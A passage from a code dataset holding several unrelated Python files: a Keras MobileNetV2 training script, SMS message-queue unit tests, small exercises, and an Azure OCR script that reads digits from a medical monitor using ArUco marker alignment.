'POST'\n\n\n# to create a nested form to have ignore period for gigfinderurls related to an artist\nGigFinderUrlFormset = inlineformset_factory(\n Artist, GigFinderUrl, extra=0, fields=('gigfinder','active_start','active_end'), widgets = {\n 'active_start': forms.DateInput(format='%d-%m-%Y'),\n 'active_end': forms.DateInput(format='%d-%m-%Y')\n }, help_texts={'active_start':'(e.g. 01-01-2020)','active_end':'(e.g. 
15-01-2020)'})\n","sub_path":"hlwtadmin/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"425390611","text":"\"\"\"\nTrain the MobileNet V2 model\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport pandas as pd\n\nfrom mobilenet_v2 import MobileNetv2\n\nfrom keras.optimizers import Adam\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint\nfrom keras.layers import Conv2D, Reshape, Activation\nfrom keras.models import Model\n\nimport tensorflow as tf\n\nfrom sklearn.metrics import classification_report\n\nimport numpy as np\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n # Required arguments.\n parser.add_argument(\n \"--classes\",\n help=\"The number of classes of dataset.\")\n # Optional arguments.\n parser.add_argument(\n \"--size\",\n default=224,\n help=\"The image size of train sample.\")\n parser.add_argument(\n \"--batch\",\n default=32,\n help=\"The number of train samples per batch.\")\n parser.add_argument(\n \"--epochs\",\n default=300,\n help=\"The number of train iterations.\")\n parser.add_argument(\n \"--weights\",\n default=False,\n help=\"Fine tune with other weights.\")\n parser.add_argument(\n \"--tclasses\",\n default=0,\n help=\"The number of classes of pre-trained model.\")\n parser.add_argument(\n \"--tflite\",\n \"-tl\",\n action=\"store_true\",\n help=\"The name of file to save the TFLite model\")\n parser.add_argument(\n \"--checkpoint\",\n default=\"\",\n help='Defines the path to save the checkpoints'\n )\n\n args = parser.parse_args()\n\n train(int(args.batch), \n int(args.epochs), \n int(args.classes), \n int(args.size), \n args.weights, \n int(args.tclasses), \n args.tflite,\n args.checkpoint)\n\ndef save_map_labels(data):\n with open('labels.json', 'w') as f:\n f.write(str(data))\n f.flush()\n\ndef generate(batch, size):\n \"\"\"Data generation and augmentation\n\n # Arguments\n batch: Integer, batch size.\n size: Integer, image size.\n\n # Returns\n train_generator: train set generator\n validation_generator: validation set generator\n count1: Integer, number of train set.\n count2: Integer, number of test set.\n \"\"\"\n\n # Using the data Augmentation in traning data\n ptrain = 'data/train'\n pval = 'data/validation'\n\n datagen1 = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n rotation_range=90,\n width_shift_range=0.2,\n height_shift_range=0.2,\n horizontal_flip=True)\n\n datagen2 = ImageDataGenerator(rescale=1. 
/ 255)\n\n train_generator = datagen1.flow_from_directory(\n ptrain,\n target_size=(size, size),\n batch_size=batch,\n class_mode='categorical')\n\n save_map_labels(train_generator.class_indices)\n\n validation_generator = datagen2.flow_from_directory(\n pval,\n target_size=(size, size),\n batch_size=batch,\n class_mode='categorical')\n\n count1 = 0\n for root, dirs, files in os.walk(ptrain):\n for each in files:\n count1 += 1\n\n count2 = 0\n for root, dirs, files in os.walk(pval):\n for each in files:\n count2 += 1\n\n return train_generator, validation_generator, count1, count2\n\n\ndef fine_tune(num_classes, weights, model):\n \"\"\"Re-build model with current num_classes.\n\n # Arguments\n num_classes, Integer, The number of classes of dataset.\n tune, String, The pre_trained model weights.\n model, Model, The model structure.\n \"\"\"\n model.load_weights(weights)\n\n x = model.get_layer('Dropout').output\n x = Conv2D(num_classes, (1, 1), padding='same')(x)\n x = Activation('softmax', name='softmax')(x)\n output = Reshape((num_classes,))(x)\n\n model = Model(inputs=model.input, outputs=output)\n\n return model\n\ndef keep_training(weights, model):\n model.load_weights(weights)\n return model\n\ndef create_callbacks(model_checkpoint=\"\"):\n \"\"\"\n # Arguments\n None\n \"\"\"\n\n callbacks = [\n EarlyStopping(monitor='val_acc',\n patience=30,\n verbose=1,\n mode='auto',\n restore_best_weights=True),\n ReduceLROnPlateau(monitor=\"val_loss\", \n factor=0.5, \n patience=10, \n verbose=1,\n mode='auto',\n min_delta=0.00001,\n cooldown=0,\n min_lr=0)\n ]\n if model_checkpoint:\n callbacks.append(\n ModelCheckpoint(\n model_checkpoint + 'weights-{epoch:02d}-{val_loss:.2f}-{val_acc:.3f}.hdf5',\n verbose=1,\n save_best_only=True\n )\n )\n\n return callbacks\n\ndef generate_report(model, generator, batch, count):\n y_pred = model.predict_generator(generator, steps= count//batch)\n \n list_ = []\n\n b = count//batch\n\n for i in range(b):\n aux = generator[i]\n aux2 = 0\n for j in aux:\n aux2 += 1\n if aux2 % 2 == 0:\n for k in j:\n list_.append(k.tolist())\n labels = [ i[0] for i in sorted(generator.class_indices.items(), key=lambda x: x[1])]\n print(classification_report(\n np.argmax(list_, axis=1),\n np.argmax(y_pred, axis=1),\n target_names = labels\n ))\n\ndef model_feed(size, num_classes):\n ''' \n\n Wrapper the model creation\n \n #Arguments\n num_classes: Integer, The number of classes to create a model.\n size: tuple, The shape of the data.\n\n #Return:\n The model\n \n '''\n\n return MobileNetv2(size, num_classes)\n\n\ndef train(batch, epochs, num_classes, size, weights, tclasses, tflite, checkpoint):\n \"\"\"Train the model.\n\n # Arguments\n batch: Integer, The number of train samples per batch.\n epochs: Integer, The number of train iterations.\n num_classes, Integer, The number of classes of dataset.\n size: Integer, image size.\n weights, String, The pre_trained model weights.\n tclasses, Integer, The number of classes of pre-trained model.\n tflite, Boolean, Convert the final model to a tflite model.\n checkpoint, String, The path to store the checktpoints\n \"\"\"\n\n train_generator, validation_generator, count1, count2 = generate(batch, size)\n\n if weights:\n if tclasses:\n print(\"fine tunning\")\n model = model_feed((size, size, 3), tclasses)\n model = fine_tune(num_classes, weights, model)\n else:\n print(\"Loading Weights\")\n model = model_feed((size, size, 3), num_classes)\n model = keep_training(weights, model)\n\n else:\n model = model_feed((size, size, 3), 
num_classes)\n\n opt = Adam()\n model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n\n calls = create_callbacks(model_checkpoint = checkpoint)\n\n hist = model.fit_generator(\n train_generator,\n validation_data=validation_generator,\n steps_per_epoch=count1 // batch,\n validation_steps=count2 // batch,\n epochs=epochs,\n callbacks=calls)\n \n if not os.path.exists('model'):\n os.makedirs('model')\n\n df = pd.DataFrame.from_dict(hist.history)\n df.to_csv('model/hist.csv', encoding='utf-8', index=False)\n print(\"Saving weights\")\n model.save_weights('model/weights.h5')\n \n model_name = \"mobile_model.h5\"\n\n if tflite:\n print(\"Saving model\")\n model.save(model_name)\n print(\"Converting model\")\n convert_to_lite(model_name)\n\n\ndef convert_to_lite(model, tflite_name=\"converted_model\"):\n \"\"\"\n Convert a saved model to tf lite format.\n\n # Arguments\n model: String, path to .h5 file model\n \"\"\"\n tflite_name += \".tflite\"\n converter = tf.contrib.lite.TFLiteConverter.from_keras_model_file(model)\n tflite_model = converter.convert()\n open(tflite_name, \"wb\").write(tflite_model)\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"144706124","text":"import random\nimport string\nimport unittest\n\nfrom redis import Redis\n\nfrom pyrowire import pyrowire as pyro\nfrom pyrowire.config import configuration as config\nfrom pyrowire.messaging.message import message_from_request\nfrom test import test_settings\n\npyro.configure(test_settings)\n\nclass TestMessageQueue(unittest.TestCase):\n def setUp(self):\n self.test_app = config.app().test_client()\n self.topic = 'sample'\n self.inbound = '/queue/%s?Body=%s&From=+1234567890&MessageSid=%s&NumMedia=%s'\n self.sid = ''.join(random.choice(string.ascii_letters) for i in range(34))\n\n self.redis = Redis(config.redis('host'), int(config.redis('port')), int(config.redis('db')), config.redis('password'))\n\n def tearDown(self):\n self.redis.delete('%s.submitted' % self.topic)\n self.redis.delete('%s.pending' % self.topic)\n self.redis.delete('%s.completed' % self.topic)\n\n def test_profane_message(self):\n expected_response = config.validators(self.topic)['profanity']\n message = 'fuck'\n response = self.test_app.get(self.inbound % (self.topic, message, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n def test_message_too_long(self):\n message = ''.join('c' for i in range(161))\n expected_response = config.validators(self.topic)['length']\n response = self.test_app.get(self.inbound % (self.topic, message, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n \n def test_message_exceeds_twilio_maximum_length(self):\n message = ''.join('c' for i in range(1600))\n expected_response = config.validators(self.topic)['length']\n response = self.test_app.get(self.inbound % (self.topic, message, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n def test_message_zero_length(self):\n expected_response = 
config.validators(self.topic)['length']\n message = ''\n response = self.test_app.get(self.inbound % (self.topic, message, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n def test_message_not_parseable(self):\n expected_response = config.validators(self.topic)['parseable']\n message = '%F0%9F%98%AC'\n response = self.test_app.get(self.inbound % (self.topic, message, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n def test_good_message(self):\n messages = ['Frank', 'Joe Bob', 'Mary Kate ']\n expected_response = config.accept_response(self.topic)\n for n in messages:\n response = self.test_app.get(self.inbound % (self.topic, n, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n def test_additional_arguments(self):\n message = 'Hello there.'\n from_country = 'USA'\n from_state = 'OR'\n from_city = 'Portland'\n from_zip = '97209'\n\n expected_response = config.accept_response(self.topic)\n inbound_message = self.inbound + '&FromCountry=%s&FromState=%s&FromCity=%s&FromZip=%s'\n response = self.test_app.get(inbound_message %\n (self.topic, message, self.sid, 0, from_country, from_state, from_city, from_zip),\n follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n\n def test_message_construction(self):\n # no additional args\n class Request(object):\n def __init__(self):\n self.method = 'GET'\n self.args = {\n 'From': '+1234567890',\n 'Body': 'Hello, there.',\n 'MessageSid': ''.join(random.choice(string.ascii_letters) for i in range(34))\n }\n self.view_args = {\n 'topic': 'sample'\n }\n\n request = Request()\n message = message_from_request(request=request)\n self.assertTrue(message['number'], request.args['From'])\n self.assertTrue(message['message'], request.args['Body'])\n self.assertTrue(message['sid'], request.args['MessageSid'])\n\n # additional args\n request.args['FromCountry'] = 'USA'\n request.args['FromState'] = 'OR'\n request.args['FromCity'] = 'Portland'\n request.args['FromZip'] = '97209'\n\n additional_args_message = message_from_request(request=request)\n\n self.assertTrue(additional_args_message['from_country'], request.args['FromCountry'])\n self.assertTrue(additional_args_message['from_state'], request.args['FromState'])\n self.assertTrue(additional_args_message['from_city'], request.args['FromCity'])\n self.assertTrue(additional_args_message['from_zip'], request.args['FromZip'])\n\n # with media\n request.args['NumMedia'] = 2\n request.args['MediaUrl0'] = 'http://some.com/some.jpg',\n request.args['MediaContentType0'] = 'image/jpeg'\n request.args['MediaUrl1'] = 'http://some.com/some_other.jpg',\n request.args['MediaContentType1'] = 'image/jpeg'\n\n media_message = message_from_request(request=request)\n\n self.assertEqual(media_message['media']['count'], 2)\n for item in [request.args['MediaUrl0'], request.args['MediaUrl1']]:\n self.assertTrue(item in media_message['media']['media'].keys())\n for item in [request.args['MediaContentType0'], request.args['MediaContentType1']]:\n self.assertTrue(item in 
media_message['media']['media'].values())\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/TestMessageQueue.py","file_name":"TestMessageQueue.py","file_ext":"py","file_size_in_byte":6556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"499039853","text":"#\n# Generator.py \n# Coding: UTF-8 !/usr/bin/env python3\n#\n# Created by 贺嘉炜 on 2017/3/9.\n# Copyright © 2017年 贺嘉炜. All rights reserved.\n#\n\n\nL = [x * x for x in range(10)]\nprint(L)\n\n# g = (x * x for x in range(10))\n# for n in g:\n# print(n)\n\n# 斐波拉契数列用列表生成式写不出来,但是,用函数把它打印出来却很容易:\ndef fib(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n = n + 1\n return 'done'\n\nfib(100)","sub_path":"python/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"443714647","text":"def cal(s):\n\tl1=[]\n\tfor i in range(2,11):\n\t\tn=int(s,i)\n\t\tfor j in range(3,int(n**0.5)+1,2):\n\t\t\tif(n%j==0):\n\t\t\t\tl1.append(j)\n\t\t\t\tbreak\n\tif(len(l1)==9):\n\t\ts1=s\n\t\tfor j in l1:\n\t\t\ts1+=\" \"+str(j)\n\t\tprint(s1)\n\t\treturn 1\n\treturn 0\nl=[]\ndef check(n):\n\tfor i in range(3,int(n**0.5) +1,2):\n\t\tif(n%i==0):\n\t\t\tl.append(n)\n\t\t\tbreak\nfor i in range(2**15+1,2**16 -1,2):\n\tcheck(i)\ndata=open(\"C-small-attempt0.in\",\"r\")\nS=data.read()\nS=S.split(\"\\n\")\nt=int(S[0])#int(input())\nfor i in range(1,t+1):\n\tprint(\"Case #{0}:\".format(i))\n\ts=S[i]\n\tn,j=int(s.split()[0]), int(s.split()[1])\n\tl=[]\n\tfor i in range(2**(n-1)+1,2**n -1):\n\t\tcheck(i)\n\tfor i in l:\n\t\ts=bin(i)[2:]\n\t\tif(s[-1]==\"0\"):\n\t\t\tcontinue\n\t\tk=cal(s)\n\t\tj=j-k\n\t\tif(j==0):\n\t\t\tbreak","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_adarshpandey_codejam3.py","file_name":"16_0_3_adarshpandey_codejam3.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"501776570","text":"from azure.cognitiveservices.vision.computervision import ComputerVisionClient\nfrom azure.cognitiveservices.vision.computervision.models import TextOperationStatusCodes\nfrom azure.cognitiveservices.vision.computervision.models import TextRecognitionMode\nfrom azure.cognitiveservices.vision.computervision.models import VisualFeatureTypes\nfrom msrest.authentication import CognitiveServicesCredentials\n\nfrom array import array\nimport os\nfrom PIL import Image\nimport sys\nimport time\nimport io\nimport json\nimport requests\nimport re\nimport cv2\nimport math\nimport numpy as np\n\n\ndef distance(p1, p2):\n xdis = (p1[0]-p2[0])**2\n ydis = (p1[1]-p2[1])**2\n return math.sqrt(xdis + ydis)\n\n\ndef fix_corners(current_corners, last_corners):\n fixed_corners = [[-1,-1], [-1,-1], [-1,-1], [-1,-1]]\n for cp in current_corners:\n min_dis = 500000000\n curr_min = 0\n for i in range(4):\n dis = distance(last_corners[i], cp)\n if dis < min_dis:\n min_dis = dis\n curr_min = i\n fixed_corners[curr_min] = cp\n for i in range(4):\n if fixed_corners[i]==[-1,-1]:\n fixed_corners[i] = last_corners[i]\n return fixed_corners\n\n\ndef order_points(pts):\n rect = np.zeros((4, 2), dtype = \"float32\")\n num_pts = np.array(pts)\n s = num_pts.sum(axis = 1)\n rect[0] = num_pts[np.argmin(s)]\n rect[2] = num_pts[np.argmax(s)]\n diff = np.diff(num_pts, axis = 1)\n rect[1] = num_pts[np.argmin(diff)]\n rect[3] = num_pts[np.argmax(diff)]\n return rect\n\n\ndef 
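The Generator.py record above contrasts a list comprehension with a plain printing function but never shows an actual generator; a sketch of the same Fibonacci sequence written with yield, to match the file's topic:

def fib_gen(max):
    # yields each Fibonacci number lazily instead of printing it
    n, a, b = 0, 0, 1
    while n < max:
        yield b
        a, b = b, a + b
        n = n + 1

print(list(fib_gen(6)))  # [1, 1, 2, 3, 5, 8]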
four_point_transform(image, pts):\n # obtain a consistent order of the points and unpack them\n # individually\n rect = order_points(pts)\n (tl, tr, br, bl) = rect\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n # compute the height of the new image, which will be the\n # maximum distance between the top-right and bottom-right\n # y-coordinates or the top-left and bottom-left y-coordinates\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left\n # order\n dst = np.array([\n [0, 0],\n [maxWidth - 1, 0],\n [maxWidth - 1, maxHeight - 1],\n [0, maxHeight - 1]], dtype = \"float32\")\n # compute the perspective transform matrix and then apply it\n M = cv2.getPerspectiveTransform(rect, dst)\n # copy = image.copy()\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n # return the warped image\n return warped\n\n\ndef detect_markers(frame):\n '''cv2.imshow('frame',frame)\n if cv2.waitKey(100) & 0xFF == ord('q'):\n pass\n time.sleep(10)'''\n \n '''frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(64,64))\n frame = clahe.apply(frame)'''\n \n dictionary = cv2.aruco.Dictionary_get(cv2.aruco.DICT_4X4_1000)\n parameters = cv2.aruco.DetectorParameters_create()\n # print('detencting')\n fixed_corners = []\n markerCorners, markerIds, rejectedCandidates = cv2.aruco.detectMarkers(frame, dictionary, parameters=parameters)\n clone = frame.copy()\n for mc in markerCorners: # top left, top right, bottom right and bottom left.\n # cv2.rectangle(clone, (mc[0][3][0], mc[0][3][1]), (mc[0][1][0], mc[0][1][1]), (0, 255, 0), 2)\n fixed_corners.append((np.mean([mc[0][0][0], mc[0][1][0], mc[0][2][0], mc[0][3][0]]),np.mean([mc[0][0][1], mc[0][1][1], mc[0][2][1], mc[0][3][1]])))\n \n #cv2.imshow(\"Window\", clone)\n #cv2.waitKey(1)\n #time.sleep(3)\n return fixed_corners\n\n\ndef create_areas(area_dict, img):\n s = img.shape\n height, width = s[0], s[1]\n areas = []\n for key, value in area_dict.items():\n hmin, hmax, wmin, wmax = value\n hmin *= height\n hmax *= height\n wmin *= width\n wmax *= width\n new_area = [img[math.ceil(hmin):math.ceil(hmax), math.ceil(wmin):math.ceil(wmax)], hmin, wmin]\n areas.append(new_area)\n return areas\n\ndef transform_coords(coords, area):\n fixed_coords = []\n for j in range(8):\n if j%2==0:\n fixed_coords.append(coords[j] + area[2])\n else:\n fixed_coords.append(coords[j] + area[1])\n return fixed_coords\n \ndef transform_boundries(boundry_dict):\n fixed_dict = {}\n for key, value in boundry_dict.items():\n fixed_value = [value[0][0]-5, value[1][0]+5, value[0][1]-5, value[1][1]+5]\n fixed_dict[key] = fixed_value\n return fixed_dict\n \n\ndef create_bounded_output(readings, boundings, boundries, method = 3):\n output_dict = {}\n for key in boundries.keys():\n for i in range(len(readings)):\n if method == 1 : # area contain\n if 
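A hypothetical usage sketch tying detect_markers and four_point_transform together (the file names are made up; it assumes all four ArUco markers are visible in the frame):

import cv2

frame = cv2.imread("monitor.jpg")
centers = detect_markers(frame)          # list of marker-center (x, y) tuples
if len(centers) == 4:
    flat = four_point_transform(frame, centers)   # top-down "birds eye" view
    cv2.imwrite("monitor_flat.jpg", flat)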
check_boundry(boundings[i], boundries[key]): #c heck if temp rect in bigger rect\n output_dict[key] = readings[i]\n elif method == 2: # area intersection\n if check_overlap(boundings[i], boundries[key]): # using precentage of interseection, greater than 0.7 is true!\n output_dict[key] = readings[i]\n elif method == 3: # dot and contain\n if check_dot(boundings[i], boundries[key]): # rectangle containing center point\n output_dict[key] = readings[i]\n if key not in output_dict.keys():\n output_dict[key] = \"N/A\"\n # output_dict[key] = None\n return output_dict\n\n\"\"\"\ndef create_bounded_output(readings, boundings, boundries):\n output_dict = {}\n for key in boundries.keys():\n for i in range(len(readings)):\n if check_boundry(boundings[i], boundries[key]):\n output_dict[key] = readings[i]\n if key not in output_dict.keys():\n output_dict[key] = \"N/A\"\n return output_dict\n\"\"\"\n\n\ndef check_overlap(temp_bounding, hard_bounding):\n a = [hard_bounding[0][0],hard_bounding[0][1],hard_bounding[1][0],hard_bounding[1][1]]\n b = [temp_bounding[0],temp_bounding[1],temp_bounding[4],temp_bounding[5]]\n total_area = (a[2] - a[0]) * (a[3] - a[1])\n dx = min(a[2], b[2]) - max(a[0], b[0])\n dy = min(a[3], b[3]) - max(a[1], b[1])\n if (dx>=0) and (dy>=0):\n if float((dx * dy) / total_area) > 0.7:\n return True\n return False\n\n \ndef check_dot(temp_bounding, hard_bounding):\n # center_dot = (hard_bounding[0][0] + (hard_bounding[1][0] - hard_bounding[0][0])/ 2 , hard_bounding[0][1] + (hard_bounding[1][1] - hard_bounding[0][1])/ 2)\n center_dot = (hard_bounding[0] + (hard_bounding[1] - hard_bounding[0])/ 2 , hard_bounding[2] + (hard_bounding[3] - hard_bounding[2])/ 2)\n if center_dot[0] >= temp_bounding[0] and center_dot[0] <= temp_bounding[4] and center_dot[1] >= temp_bounding[1] and center_dot[1] <= temp_bounding[5]:\n return True\n return False\n\n\ndef check_boundry(bounding, boundry):\n output = bounding[0]>=boundry[0]\n output = output and (bounding[6]>=boundry[0])\n output = output and (bounding[2]<=boundry[1])\n output = output and (bounding[4]<=boundry[1])\n output = output and (bounding[1]>=boundry[2])\n output = output and (bounding[3]>=boundry[2])\n output = output and (bounding[5]<=boundry[3])\n output = output and (bounding[7]<=boundry[3])\n return output \n\n\ndef fix_string(s):\n json_string_fin = \"\"\n last_c=\"\"\n for c in s:\n if c!=\"\\'\":\n json_string_fin += c\n if c==\"{\":\n if last_c==\"\\'\":\n json_string_fin = last_string + \"\\'{\"\n else:\n last_string = json_string_fin\n if last_c!=\"}\":\n json_string_fin += \"\\\"\"\n else:\n json_string_fin += \"\\'\"\n last_c = c\n return json_string_fin\n\ndef output_former(ocr_res, room, pat_id, mon_id):\n string_json = json.dumps(ocr_res)\n json_dict = {}\n json_dict[\"JsonData\"] = string_json\n json_dict[\"MonitorID\"] = mon_id\n json_dict[\"PatientID\"] = pat_id\n json_dict[\"Room\"] = room\n json_dict_string = str(json_dict)\n print(json_dict_string)\n output = fix_string(json_dict_string)\n return output\n\n\ndef sockets_output_former(ocr_res, room, pat_id, mon_id):\n json_dict = {}\n json_dict[\"JsonData\"] = ocr_res\n json_dict[\"MonitorID\"] = mon_id\n json_dict[\"PatientID\"] = pat_id\n json_dict[\"Room\"] = room\n output = json.dumps(json_dict)\n print(output)\n\n return output\n\n\n\ndef get_digits(img, computervision_client):\n # encodedFrame = cv2.imencode(\".jpg\", img)[1].tostring()\n recognize_printed_results = computervision_client.batch_read_file_in_stream(io.BytesIO(img), raw = True)\n # Reading OCR 
results\n operation_location_remote = recognize_printed_results.headers[\"Operation-Location\"]\n operation_id = operation_location_remote.split(\"/\")[-1]\n while True:\n get_printed_text_results = computervision_client.get_read_operation_result(operation_id)\n if get_printed_text_results.status not in ['NotStarted', 'Running']:\n break\n time.sleep(0.1)\n \n tmp_frame = cv2.imdecode(np.frombuffer(img, np.uint8), -1)\n results = []\n text_flag = False\n show_frame_flag = False\n if get_printed_text_results.status == TextOperationStatusCodes.succeeded:\n for text_result in get_printed_text_results.recognition_results:\n for line in text_result.lines:\n # print(line.text, line.bounding_box)\n s = re.sub('[^0123456789./]', '', line.text)\n if s != \"\":\n if s[0] == \".\":\n s = s[1:]\n s = s.rstrip(\".\")\n text_flag = True\n cv2.rectangle(tmp_frame, (int(line.bounding_box[0]), int(line.bounding_box[1])), (int(line.bounding_box[4]), int(line.bounding_box[5])), (255,0,0), 2)\n cv2.putText(tmp_frame,s,(int(line.bounding_box[0])-5, int(line.bounding_box[1])-5),cv2.FONT_HERSHEY_COMPLEX,0.3,(0,0,0),1)\n results.append((s, line.bounding_box))\n else:\n continue\n if text_flag and show_frame_flag:\n cv2.imshow(\"image\", tmp_frame)\n cv2.waitKey(0)\n return(results)\n\n\n\ndef AnalyzeFrame(frame, computervision_client, boundries, ocrsocket):\n frame = cv2.imdecode(np.frombuffer(frame, np.uint8), -1)\n \n # Find ARuco corners:\n new_corners = detect_markers(frame)\n corners = [(529.0, 380.75), (157.5, 380.5), (604.75, 172.25), (101.25, 168.0)] #mon3\n # corners = [(120.0, 404.0), (532.25, 386.0), (573.0, 124.0), (80.75, 113.5)] #mon4\n\n # TODO: raise exception if more than one corner wasn't detected:\n fixed_corners = fix_corners(new_corners, corners)\n # pts = order_points(fixed_corners)\n frame = four_point_transform(frame, fixed_corners)\n\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # blurred = cv2.GaussianBlur(gray, (5, 5), 0)\n # rectKernel = cv2.getStructuringElement(cv2.MORPH_RECT, (9,3))\n # frame = cv2.morphologyEx(gray,cv2.MORPH_TOPHAT, gray)\n\n # TODO: get area_dicts from MOB/DB\n #areas_dict = {'side': [0, 1, 0.7, 0.9], 'bottom': [0.6, 0.9, 0.3, 0.7]} #will be an input later! #monitor 1\n areas_dict = {'side': [0.1, 0.9, 0.67, 0.92]} #will be an input later! #monitor 3\n areas_dict = {'low': [0.6, 0.85, 0, 0.5], 'side': [0.1, 0.9, 0.6, 0.9]}\n areas = create_areas(areas_dict, frame)\n\n # our output\n readings = {}\n boundings = {}\n i = 0\n for area in areas:\n results = get_digits(cv2.imencode(\".jpg\", area[0])[1], computervision_client)\n for item in results:\n readings[i] = item[0]\n boundings[i] = transform_coords(item[1], area)\n i = i + 1\n # boundry_dict = {i:[min(x[0],x[6]) -15,max(x[2],x[4]) +15 ,min(x[3],x[1]) -15,max(x[5],x[7]) + 15] for i,x in enumerate(boundings.values())}\n # boundry_temp_mon32 = {0: ((471.0, 129), (516.0, 165)), 1: ((464.0, 170), (533.0, 213)), 2: ((469.0, 222), (541.0, 244)), 3: ((469.0, 272), (508.0, 306)), 4: ((471.0, 315), (505.0, 351))}\n \n # MES-Setup inpurt by hand. 
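The digit-filtering regex in get_digits keeps only digits, '.' and '/'; a quick standalone check of that step (the sample string is made up):

import re

s = re.sub('[^0123456789./]', '', 'HR 72 bpm')
print(s)   # -> '72'
# get_digits then additionally strips a leading '.' and any trailing dots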
TODO: get from API in the beginning\n    boundry_temp_mon32 = {0: ((132, 316.0), (246, 345.0)), 1: ((449.0, 172.0), (509.0, 221.0)), 2: ((439.0, 230.0), (485.0, 269.0)), 3: ((435.0, 271.0), (483.0, 312.0))}\n    helka_dictionary = {0: [374.0, 18.0, 429.0, 18.0, 429.0, 51.0, 374.0, 52.0], 1: [370.0, 59.0, 419.0, 59.0, 417.0, 93.0, 369.0, 92.0], 2: [358.0, 96.0, 419.0, 92.0, 420.0, 128.0, 358.0, 122.0], 3: [34.0, 132.0, 197.0, 134.0, 196.0, 163.0, 33.0, 160.0]} #mon3\n    boundry_temp_mon32 = {0: ((365.0, 26.0), (379.0, 39.0)), 1: ((380.0, 17.0), (437.0, 53.0)), 2: ((375.0, 61.0), (425.0, 95.0)), 3: ((377.0, 96.0), (429.0, 131.0)), 4: ((58.0, 140.0), (160.0, 166.0)), 5: ((93.0, 164.0), (140.0, 177.0))}\n    temp_mon = {k:[[v[0],v[1]],[v[4],v[5]]] for k,v in helka_dictionary.items()} # convert the 8-value corner dict to the ((top-left), (bottom-right)) form used above\n\n    output = create_bounded_output(readings, boundings, transform_boundries(boundry_temp_mon32), 3)\n    # output = create_bounded_output(readings, boundings, temp_mon, 3)\n    # print(output)\n\n    \n    # TODO: get as input, when Shany's team is ready\n    pat_id = \"200465524\"\n    room = \"13\"\n    mon_id = \"90210\"\n    json_to_socket = sockets_output_former(output, room, pat_id, mon_id)\n    ocrsocket.emit('data', json_to_socket)\n    return\n\n    # NOTE: the early return above short-circuits the HTTP POST path below,\n    # which is left here as disabled (unreachable) code.\n    json_string_fin = output_former(output, room, pat_id, mon_id)\n    print(json_string_fin)\n    url = \"http://rstreamapp.azurewebsites.net/api/InsertMonitorData\"\n    headers={'Content-type':'application/json', 'Accept':'application/json'}\n    response = requests.post(url, data=json_string_fin, headers=headers)\n\n    # TODO: sanity check results (characters etc.) and send them to somewhere\n    return\n\n\n","sub_path":"AnalyzeFrame.py","file_name":"AnalyzeFrame.py","file_ext":"py","file_size_in_byte":14360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"283833786","text":"#\n# @lc app=leetcode.cn id=103 lang=python3\n#\n# [103] 二叉树的锯齿形层次遍历\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nclass Solution:\n    def __init__(self):\n        self.ans=[[]]\n    def zigzagLevelOrder(self, 